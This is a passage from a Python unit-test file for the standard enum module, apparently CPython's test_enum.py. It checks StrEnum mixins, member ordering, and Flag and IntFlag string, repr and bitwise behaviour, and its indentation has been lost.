self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_custom_strenum_with_warning(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
with self.assertWarns(DeprecationWarning):
self.assertEqual('{}'.format(OkayEnum.one), '1')
self.assertEqual(OkayEnum.one, '{}'.format(OkayEnum.one))
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
@unittest.skipIf(
python_version < (3, 12),
'mixin-format currently uses member.value',
)
def test_custom_strenum(self):
class CustomStrEnum(str, Enum):
pass
class OkayEnum(CustomStrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(OkayEnum.one, '1')
self.assertEqual(str(OkayEnum.one), 'one')
self.assertEqual('{}'.format(OkayEnum.one), 'one')
self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, CustomStrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, CustomStrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(str(HelloEnum.eight), 'eight')
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(str(GoodbyeEnum.nine), 'nine')
#
class FirstFailedStrEnum(CustomStrEnum):
one = 1 # this will become '1'
two = '2'
class SecondFailedStrEnum(CustomStrEnum):
one = '1'
two = 2, # this will become '2'
three = '3'
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = 2 # this will become '2'
with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
class ThirdFailedStrEnum(CustomStrEnum):
one = '1'
two = b'2', 'ascii', 9
def test_missing_value_error(self):
with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
class Combined(str, Enum):
#
def __new__(cls, value, sequence):
enum = str.__new__(cls, value)
if '(' in value:
fis_name, segment = value.split('(', 1)
segment = segment.strip(' )')
else:
fis_name = value
segment = None
enum.fis_name = fis_name
enum.segment = segment
enum.sequence = sequence
return enum
#
def __repr__(self):
return "<%s.%s>" % (self.__class__.__name__, self._name_)
#
key_type = 'An$(1,2)', 0
company_id = 'An$(3,2)', 1
code = 'An$(5,1)', 2
description = 'Bn$', 3
@unittest.skipUnless(
python_version == (3, 9),
'private variables are now normal attributes',
)
def test_warning_for_private_variables(self):
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__corporal = 'Radar'
self.assertEqual(Private._Private__corporal.value, 'Radar')
try:
with self.assertWarns(DeprecationWarning):
class Private(Enum):
__major_ = 'Hoolihan'
except ValueError:
pass
def test_private_variable_is_normal_attribute(self):
class Private(Enum):
__corporal = 'Radar'
__major_ = 'Hoolihan'
self.assertEqual(Private._Private__corporal, 'Radar')
self.assertEqual(Private._Private__major_, 'Hoolihan')
@unittest.skipUnless(
python_version < (3, 12),
'member-member access now raises an exception',
)
def test_warning_for_member_from_member_access(self):
with self.assertWarns(DeprecationWarning):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
self.assertIs(Di.NO, nope)
@unittest.skipUnless(
python_version >= (3, 12),
'member-member access currently issues a warning',
)
def test_exception_for_member_from_member_access(self):
with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."):
class Di(Enum):
YES = 1
NO = 0
nope = Di.YES.NO
def test_strenum_auto(self):
class Strings(StrEnum):
ONE = auto()
TWO = auto()
self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two'])
def test_dynamic_members_with_static_methods(self):
#
foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'}
class Foo(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
})
def upper(self):
return self.value.upper()
self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE])
self.assertEqual(Foo.FOO_CAT.value, 'aloof')
self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG')
#
with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"):
class FooBar(Enum):
vars().update({
k: v
for k, v in foo_defines.items()
if k.startswith('FOO_')
},
**{'FOO_CAT': 'small'},
)
def upper(self):
return self.value.upper()
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(Perm(~0)), 'R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), 'R')
self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'BLACK' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RO' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum memmbers before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
self.assertFalse('BLACK' in Color)
self.assertFalse('RO' in Open)
self.assertTrue(1 in Color)
self.assertTrue(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
#
class NewPerm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
def __str__(self):
return self._name_
self.assertEqual(format(NewPerm.R, ''), 'R')
self.assertEqual(format(NewPerm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
